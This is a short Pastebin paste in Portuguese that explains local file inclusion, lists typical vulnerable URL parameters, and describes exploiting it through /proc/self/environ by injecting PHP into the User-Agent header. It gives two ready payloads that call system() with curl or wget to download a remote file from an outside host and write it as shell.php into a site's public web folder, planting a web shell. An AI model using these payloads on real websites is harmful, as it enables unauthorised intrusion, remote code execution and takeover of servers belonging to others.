Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- By b4l0x / ./Cryptonking
- Bom galera lfi é uma falha na qual você pode ler arquivos como por exemplo /etc/passwd ou até mesmo arquivos php no caso vc usaria filtros dai, isso fica pra um proximo video essas falhas geralmente ficam em coisas desse tipo
- pagina=home.html
- page=home.html
- verarquivo=amigos.pdf
- e coisas do tipo nesse caso a exploração usando /proc/self/environ é feita pelo user agent no qual vc pode injetar codigos php como por exemplo:
- <?php system('curl http://privshells.com/upload/gaza.txt -o /home/pref/public_html/shell.php'); ?>
- <?php system('wget http://privshells.com/upload/gaza.txt -O /home/pref/public_html/shell.php'); ?>
- é basicamente isso ae galera é nois
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement